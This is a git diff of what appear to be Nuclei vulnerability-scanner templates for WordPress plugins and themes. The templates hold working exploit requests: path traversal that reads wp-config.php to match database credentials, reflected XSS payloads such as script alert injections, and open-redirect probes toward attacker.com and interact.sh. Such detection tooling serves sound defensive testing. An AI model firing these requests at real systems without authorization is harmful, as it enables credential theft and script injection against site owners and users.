diff --git a/vulnerabilities/wordpress/db-backup-lfi.yaml b/vulnerabilities/wordpress/db-backup-lfi.yaml
deleted file mode 100644
index 48dcb57edf..0000000000
--- a/vulnerabilities/wordpress/db-backup-lfi.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: db-backup-lfi
-
-info:
-  name: DB Backup <= 4.5 - Path Traversal File Access
-  author: dhiyaneshDK
-  severity: high
-  description: WordPress Plugin DB Backup is prone to a directory traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive
-    information that could aid in further attacks. WordPress Plugin DB Backup version 4.5 is vulnerable; prior versions may also be affected.
-  reference:
-    - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
-    - https://www.exploit-db.com/exploits/35378
-  tags: wordpress,wp-plugin,lfi,wp
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "DB_NAME"
-          - "DB_PASSWORD"
-        condition: and
-
-      - type: status
-        status:
-          - 200
diff --git a/vulnerabilities/wordpress/diarise-theme-lfi.yaml b/vulnerabilities/wordpress/diarise-theme-lfi.yaml
index 366df9bb91..c40168260b 100644
--- a/vulnerabilities/wordpress/diarise-theme-lfi.yaml
+++ b/vulnerabilities/wordpress/diarise-theme-lfi.yaml
@@ -11,7 +11,7 @@ info:
     - https://woocommerce.com/?aff=1790
   classification:
     cwe-id: CWE-98
-  tags: wordpress,wp-theme,lfi
+  tags: packetstorm,wordpress,wp-theme,lfi
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml b/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml
index f83ef7300e..30a926ddec 100644
--- a/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml
+++ b/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml
@@ -1,25 +1,25 @@
-id: dzs-zoomsounds-listing
+id: dzs-zoomsounds-listing
 
-info:
-  name: WordPress Plugin dzs zoomsounds
-  author: pussycat0x
-  severity: info
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
-  tags: wordpress,listing,wp-plugin,wp
+info:
+  name: WordPress Plugin dzs zoomsounds
+  author: pussycat0x
+  severity: info
+  description: Searches for sensitive directories present in the dzs-zoomsounds plugin.
+  tags: wordpress,listing,wp-plugin,wp
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/dzs-zoomsounds/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Index of"
-          - "/wp-content/plugins/dzs-zoomsounds"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/dzs-zoomsounds/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Index of"
+          - "/wp-content/plugins/dzs-zoomsounds"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml b/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml
index de7c8f2d98..c1f0acf393 100644
--- a/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml
+++ b/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml
@@ -1,25 +1,25 @@
-id: easy-media-gallery-pro-listing
+id: easy-media-gallery-pro-listing
 
-info:
-  name: WordPress Plugin Media Gallery Pro Listing
-  author: pussycat0x
-  severity: info
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
-  reference: https://www.exploit-db.com/ghdb/6455
-  tags: wordpress,listing,wp-plugin
+info:
+  name: WordPress Plugin Media Gallery Pro Listing
+  author: pussycat0x
+  severity: info
+  description: Searches for sensitive directories present in the easy-media-gallery-pro plugin.
+  reference: https://www.exploit-db.com/ghdb/6455
+  tags: wordpress,listing,wp-plugin
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/easy-media-gallery-pro/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Index of"
-          - "wp-content/plugins/easy-media-gallery-pro/"
-        condition: and
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/easy-media-gallery-pro/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Index of"
+          - "wp-content/plugins/easy-media-gallery-pro/"
+        condition: and
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
index 376ae78efd..dc107058d4 100644
--- a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
+++ b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
@@ -1,21 +1,22 @@
 id: eatery-restaurant-open-redirect
 
 info:
-  name: WordPress Attitude Themes 1.1.1 Open Redirection
+  name: WordPress Eatery Restaurant Themes < 2.2 - Open Redirection
   author: 0x_Akoko
   severity: low
-  description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.
+  description: |
+    WordPress Eatery Restaurant Themes 2.2 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect
   reference:
     - https://cxsecurity.com/issue/WLB-2020030183
-  tags: wordpress,wp-theme,redirect
+  tags: wordpress,wp-theme,redirect,wp
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/themes/eatery/nav.php?-Menu-=https://example.com/"
+      - "{{BaseURL}}/wp-content/themes/eatery/nav.php?-Menu-=https://interact.sh/"
 
     matchers:
       - type: regex
-        regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
         part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
diff --git a/vulnerabilities/wordpress/elex-woocommerce-xss.yaml b/vulnerabilities/wordpress/elex-woocommerce-xss.yaml
index 0a91138dfb..e409cba5e8 100644
--- a/vulnerabilities/wordpress/elex-woocommerce-xss.yaml
+++ b/vulnerabilities/wordpress/elex-woocommerce-xss.yaml
@@ -1,7 +1,7 @@
 id: elex-woocommerce-xss
 
 info:
-  name: WordPress WooCommerce Google Shopping < 1.2.4 - Reflected Cross-Site Scripting
+  name: WordPress WooCommerce Google Shopping < 1.2.4 - Cross-Site Scripting
   author: dhiyaneshDk
   severity: high
   description: WordPress WooCommerce Google Shopping < 1.2.4 is susceptible to cross-site scripting because the plugin does not sanitize or escape the search GET parameter before outputting it back in the page and
@@ -12,7 +12,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     cvss-score: 7.2
     cwe-id: CWE-79
-  tags: wordpress,wp-plugin,xss,authenticated,woocommerce
+  tags: wp-plugin,xss,authenticated,woocommerce,wpscan,wordpress
 
 requests:
   - raw:
diff --git a/vulnerabilities/wordpress/feedwordpress-xss.yaml b/vulnerabilities/wordpress/feedwordpress-xss.yaml
deleted file mode 100644
index 20cc24cc81..0000000000
--- a/vulnerabilities/wordpress/feedwordpress-xss.yaml
+++ /dev/null
@@ -1,41 +0,0 @@
-id: feedwordpress-xss
-
-info:
-  name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS)
-  author: dhiyaneshDk
-  severity: medium
-  description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
-  reference:
-    - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
-  tags: wordpress,wp-plugin,xss,feedwordpress,authenticated
-
-requests:
-  - raw:
-      - |
-        POST /wp-login.php HTTP/1.1
-        Host: {{Hostname}}
-        Origin: {{RootURL}}
-        Content-Type: application/x-www-form-urlencoded
-        Cookie: wordpress_test_cookie=WP%20Cookie%20check
-
-        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
-      - |
-        GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
-        Host: {{Hostname}}
-
-    cookie-reuse: true
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"><img src=2 onerror=alert(document.domain)>" method="post">'
-
-      - type: word
-        part: header
-        words:
-          - text/html
-
-      - type: status
-        status:
-          - 200
diff --git a/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml b/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml
index af1015d333..c1341f0c0f 100644
--- a/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml
+++ b/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml
@@ -1,12 +1,17 @@
 id: flow-flow-social-stream-xss
 
 info:
-  name: Flow-Flow Social Stream <= 3.0.71 - Cross-Site Scripting
+  name: WordPress Flow-Flow Social Stream <=3.0.71 - Cross-Site Scripting
   author: alph4byt3
   severity: medium
+  description: WordPress Flow-Flow Social Stream 3.0.7.1 and prior is vulnerable to cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/8354b34e-40f4-4b70-bb09-38e2cf572ce9
-  tags: xss,wordpress
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: xss,wordpress,wpscan
 
 requests:
   - method: GET
@@ -30,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/hb-audio-lfi.yaml b/vulnerabilities/wordpress/hb-audio-lfi.yaml
index 4a0e7ea744..2d7e38cca5 100644
--- a/vulnerabilities/wordpress/hb-audio-lfi.yaml
+++ b/vulnerabilities/wordpress/hb-audio-lfi.yaml
@@ -1,14 +1,19 @@
 id: hb-audio-lfi
 
 info:
-  name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Retrieval
+  name: Wordpress HB Audio Gallery Lite - Local File Inclusion
   author: dhiyaneshDK
   severity: high
+  description: Wordpress HB Audio Gallery Lite is vulnerable to local file inclusion.
   reference:
     - https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html
   metadata:
-    google-dork: inurl:/wp-content/plugins/hb-audio-gallery-lite
-  tags: wordpress,wp-plugin,lfi,wp
+    google-query: inurl:/wp-content/plugins/hb-audio-gallery-lite
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: wp,packetstorm,wordpress,wp-plugin,lfi
 
 requests:
   - method: GET
@@ -27,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/05
diff --git a/vulnerabilities/wordpress/health-check-lfi.yaml b/vulnerabilities/wordpress/health-check-lfi.yaml
index c6e1a39f3c..3f766e2349 100644
--- a/vulnerabilities/wordpress/health-check-lfi.yaml
+++ b/vulnerabilities/wordpress/health-check-lfi.yaml
@@ -1,15 +1,19 @@
 id: health-check-lfi
 
 info:
-  name: Health Check & Troubleshooting <= 1.2.3 - Authenticated Path Traversal
+  name: WordPress Health Check & Troubleshooting <1.24 - Local File Inclusion
   author: DhiyaneshDK
   severity: high
-  description: The Health Check & Troubleshooting WordPress plugin was affected by an Authenticated Path Traversal security vulnerability.
-  remediation: Fixed in version 1.2.4
+  description: WordPress Health Check & Troubleshooting prior to 1.2.4 is vulnerable to local file inclusion. Exploitation does require authentication.
+  remediation: Upgrade to version 1.2.4 or later.
   reference:
     - https://wpscan.com/vulnerability/5eecc4a7-0b44-495d-9352-78dccebfc72a
     - https://www.synacktiv.com/ressources/advisories/WordPress_Health_Check_1.2.3_Vulnerabilities.pdf
-  tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr,wpscan
 
 requests:
   - raw:
@@ -43,3 +47,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/05
diff --git a/vulnerabilities/wordpress/members-list-xss.yaml b/vulnerabilities/wordpress/members-list-xss.yaml
new file mode 100644
index 0000000000..dfe1948ff2
--- /dev/null
+++ b/vulnerabilities/wordpress/members-list-xss.yaml
@@ -0,0 +1,39 @@
+id: members-list-xss
+
+info:
+  name: WordPress Members List <4.3.7 - Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: WordPress Members List 4.3.7 does not sanitize and escape some parameters in various pages before outputting them back, leading to reflected cross-site scripting vulnerabilities.
+  reference:
+    - https://wpscan.com/vulnerability/d13f26f0-5d91-49d7-b514-1577d4247648
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: wp,wordpress,wp-plugin,xss,wpscan
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/members-list/admin/view/user.php?page=%22%3E%3Cimg%20src%20onerror=alert(document.domain)%20x'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><img src onerror=alert(document.domain) x'
+          - "wrap tern-wrap"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/modula-image-gallery-xss.yaml b/vulnerabilities/wordpress/modula-image-gallery-xss.yaml
new file mode 100644
index 0000000000..bff1ede706
--- /dev/null
+++ b/vulnerabilities/wordpress/modula-image-gallery-xss.yaml
@@ -0,0 +1,50 @@
+id: modula-image-gallery-xss
+
+info:
+  name: WordPress Modula Image Gallery <2.6.7 - Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: WordPress Modula Image Gallery 2.6.7 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
+  reference:
+    - https://wpscan.com/vulnerability/ee248078-89ee-4cc0-b0fe-e932cd00db3e
+    - https://wordpress.org/plugins/modula-best-grid-gallery
+  metadata:
+    verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: authenticated,wpscan,wp-plugin,xss,wp,wordpress
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/edit.php?post_type=modula-gallery&page=modula-addons&a"><script>alert(1)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '&a\"><script>alert(1)</script>&extensions='
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/mthemeunus-lfi.yaml b/vulnerabilities/wordpress/mthemeunus-lfi.yaml
index bb1b5770e5..2c6147bf76 100644
--- a/vulnerabilities/wordpress/mthemeunus-lfi.yaml
+++ b/vulnerabilities/wordpress/mthemeunus-lfi.yaml
@@ -1,14 +1,18 @@
 id: mthemeunus-lfi
 
 info:
-  name: mTheme-Unus Theme - Local File Inclusion (LFI)
+  name: WordPress mTheme-Unus Theme - Local File Inclusion
   author: dhiyaneshDk
   severity: high
-  description: The mTheme-Unus WordPress Theme was affected by a css.php Local File Inclusion security vulnerability.
+  description: WordPress mTheme-Unus Theme is vulnerable to local file inclusion via css.php.
   reference:
     - https://wpscan.com/vulnerability/bc036ee3-9648-49db-ae52-3a58fdeb82eb
     - https://packetstormsecurity.com/files/133778/
-  tags: wordpress,wp-theme,lfi,wordpress,mtheme
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: wpscan,packetstorm,wordpress,wp-theme,lfi,mtheme
 
 requests:
   - method: GET
@@ -27,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/05
diff --git a/vulnerabilities/wordpress/music-store-open-redirect.yaml b/vulnerabilities/wordpress/music-store-open-redirect.yaml
index 762915a8cd..9ed2338893 100644
--- a/vulnerabilities/wordpress/music-store-open-redirect.yaml
+++ b/vulnerabilities/wordpress/music-store-open-redirect.yaml
@@ -8,17 +8,17 @@ info:
   reference:
     - https://wpscan.com/vulnerability/d73f6575-eb86-480c-bde1-f8765870cdd1
     - https://seclists.org/fulldisclosure/2015/Jul/113
-  tags: wordpress,redirect,wp-plugin,musicstore,wp
+  tags: musicstore,wp,wpscan,seclists,wordpress,redirect,wp-plugin
 
 requests:
   - raw:
       - |
         GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1
         Host: {{Hostname}}
-        Referer: https://example.com
+        Referer: https://interact.sh
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/vulnerabilities/wordpress/my-chatbot-xss.yaml b/vulnerabilities/wordpress/my-chatbot-xss.yaml
index adb3a0d840..11fc1cecab 100644
--- a/vulnerabilities/wordpress/my-chatbot-xss.yaml
+++ b/vulnerabilities/wordpress/my-chatbot-xss.yaml
@@ -1,9 +1,9 @@
 id: my-chatbot-xss
 
 info:
-  name: WordPress My Chatbot <= 1.1 - Reflected Cross-Site Scripting
+  name: WordPress My Chatbot <= 1.1 - Cross-Site Scripting
   author: dhiyaneshDk
-  severity: medium
+  severity: high
   description: WordPress My Chatbot <= 1.1  is susceptible to cross-site scripting. The plugin does not sanitize or escape its tab parameter in the Settings page before outputting it back in an attribute.
   reference:
     - https://wpscan.com/vulnerability/c0b6f63b-95d1-4782-9554-975d6d7bbd3d
@@ -11,7 +11,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     cvss-score: 7.2
     cwe-id: CWE-79
-  tags: wordpress,wp-plugin,xss,authenticated
+  tags: wordpress,wp-plugin,xss,authenticated,wpscan
 
 requests:
   - raw:
diff --git a/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml
index 6f1dfbf9fe..bb6183b621 100644
--- a/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml
+++ b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml
@@ -1,13 +1,15 @@
 id: nativechurch-wp-theme-lfd
 
 info:
-  name: WordPress NativeChurch Theme - Arbitrary File Retrieval
+  name: WordPress NativeChurch Theme - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: An arbitrary file retrieval vulnerability in the download.php file in the NativeChurch Theme allows attackers to download files from the system.
+  description: |
+    WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file.
   reference:
     - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
-  tags: wordpress,wp-theme,lfi
+    - https://wpscan.com/vulnerability/2e1062ed-0c48-473f-aab2-20ac9d4c72b1
+  tags: wp-theme,lfi,wp,packetstorm,wpscan,wordpress
 
 requests:
   - method: GET
@@ -17,10 +19,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "DB_NAME"
           - "DB_PASSWORD"
           - "DB_HOST"
           - "The base configurations of the WordPress"
-        part: body
         condition: and
+
+# Enhanced by mp on 2022/07/29
diff --git a/vulnerabilities/wordpress/new-user-approve-xss.yaml b/vulnerabilities/wordpress/new-user-approve-xss.yaml
new file mode 100644
index 0000000000..a563667db3
--- /dev/null
+++ b/vulnerabilities/wordpress/new-user-approve-xss.yaml
@@ -0,0 +1,51 @@
+id: new-user-approve-xss
+
+info:
+  name: WordPress New User Approve <2.4.1 - Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: WordPress New User Approve 2.4.1 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
+  reference:
+    - https://wpscan.com/vulnerability/17f99601-f5c9-4300-9b4a-6d75fa7ab94a
+    - https://wordpress.org/plugins/new-user-approve
+  metadata:
+    verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: wordpress,xss,authenticated,wp-plugin,wpscan,wp
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/index.php?a%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '?a"><script>alert(1)</script>&new-user-approve-settings'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml b/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
deleted file mode 100644
index 2b65920e1e..0000000000
--- a/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: newsletter-manager-open-redirect
-
-info:
-  name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
-  author: akincibor
-  severity: low
-  description: |
-    The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
-  reference:
-    - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
-  metadata:
-    verified: true
-  tags: wp-plugin,redirect,wordpress,wp,unauth
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ=="
-
-    matchers:
-      - type: regex
-        part: header
-        regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/vulnerabilities/wordpress/newsletter-open-redirect.yaml b/vulnerabilities/wordpress/newsletter-open-redirect.yaml
index 2960aceaa6..8dfa04f118 100644
--- a/vulnerabilities/wordpress/newsletter-open-redirect.yaml
+++ b/vulnerabilities/wordpress/newsletter-open-redirect.yaml
@@ -10,17 +10,17 @@ info:
     - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
   classification:
     cwe-id: CWE-601
-  tags: wordpress,redirect,wp-plugin,newsletter,wp
+  tags: redirect,wp-plugin,newsletter,wp,wpscan,wordpress
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ=="
+      - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo"
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
 
 # Enhanced by mp on 2022/04/13
diff --git a/vulnerabilities/wordpress/pieregister-open-redirect.yaml b/vulnerabilities/wordpress/pieregister-open-redirect.yaml
index 1696507595..907b718272 100644
--- a/vulnerabilities/wordpress/pieregister-open-redirect.yaml
+++ b/vulnerabilities/wordpress/pieregister-open-redirect.yaml
@@ -10,17 +10,17 @@ info:
     - https://wordpress.org/plugins/pie-register/
   classification:
     cwe-id: CWE-601
-  tags: wordpress,redirect,wp-plugin,pieregister
+  tags: redirect,wp-plugin,pieregister,wpscan,wordpress
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com"
+      - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://interact.sh"
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
 
 # Enhanced by mp on 2022/04/13
diff --git a/vulnerabilities/wordpress/sassy-social-share.yaml b/vulnerabilities/wordpress/sassy-social-share.yaml
index 8d425c291c..f7790fbc98 100644
--- a/vulnerabilities/wordpress/sassy-social-share.yaml
+++ b/vulnerabilities/wordpress/sassy-social-share.yaml
@@ -1,10 +1,18 @@
 id: sassy-social-share-xss
 
 info:
-  name: Sassy Social Share <= 3.3.3 - Cross-Site Scripting
+  name: Sassy Social Share <=3.3.3 - Cross-Site Scripting
   author: Random_Robbie
   severity: medium
-  tags: wordpress,wp-plugin,sassy,xss
+  description: |
+    WordPress Sassy Social Share 3.3.3 and prior is vulnerable to cross-site scripting because certain AJAX endpoints return JSON data with no Content-Type header set and then use the default text/html. In other words, any JSON that has HTML will be rendered as such.
+  reference:
+    - https://wpscan.com/vulnerability/4631519b-2060-43a0-b69b-b3d7ed94c705
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: xss,wp,wpscan,wordpress,wp-plugin,sassy
 
 requests:
   - method: GET
@@ -29,4 +37,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/seo-redirection-xss.yaml b/vulnerabilities/wordpress/seo-redirection-xss.yaml
index 41362a0a81..663d14f2e2 100644
--- a/vulnerabilities/wordpress/seo-redirection-xss.yaml
+++ b/vulnerabilities/wordpress/seo-redirection-xss.yaml
@@ -1,15 +1,19 @@
 id: seo-redirection-xss
 
 info:
-  name: WordPress SEO Redirection < 7.4 - Reflected Cross-Site Scripting
+  name: WordPress SEO Redirection <7.4 - Cross-Site Scripting
   author: DhiyaneshDK
   severity: medium
   description: |
-    The plugin does not escape the tab parameter before outputting it back in JavaScript code, leading to a Reflected Cross-Site Scripting issue.
+    WordPress SEO Redirection 7.4 does not escape the tab parameter before outputting it back in JavaScript code, leading to a reflected cross-site scripting vulnerability.
   remediation: Fixed in version 7.4.
   reference:
     - https://wpscan.com/vulnerability/b694b9c0-a367-468c-99c2-6ba35bcf21ea
-  tags: wordpress,xss,wp-plugin,authenticated
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: wordpress,xss,wp-plugin,authenticated,wpscan
 
 requests:
   - raw:
@@ -52,3 +56,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/shortcode-lfi.yaml b/vulnerabilities/wordpress/shortcode-lfi.yaml
index 1bd28a766b..0fe1c934d2 100644
--- a/vulnerabilities/wordpress/shortcode-lfi.yaml
+++ b/vulnerabilities/wordpress/shortcode-lfi.yaml
@@ -1,16 +1,19 @@
 id: shortcode-lfi
 
 info:
-  name: WordPress Plugin Download Shortcode Local File Inclusion (0.2.3)
+  name: WordPress Download Shortcode 0.2.3 - Local File Inclusion
   author: dhiyaneshDK
   severity: high
-  description: WordPress Plugin Download Shortcode is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain
-    sensitive information that could aid in further attacks. WordPress Plugin Download Shortcode version 0.2.3 is vulnerable; prior versions may also be affected.
+  description: WordPress Download Shortcode 0.2.3 is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. Prior versions may also be affected.
   reference:
     - https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html
   metadata:
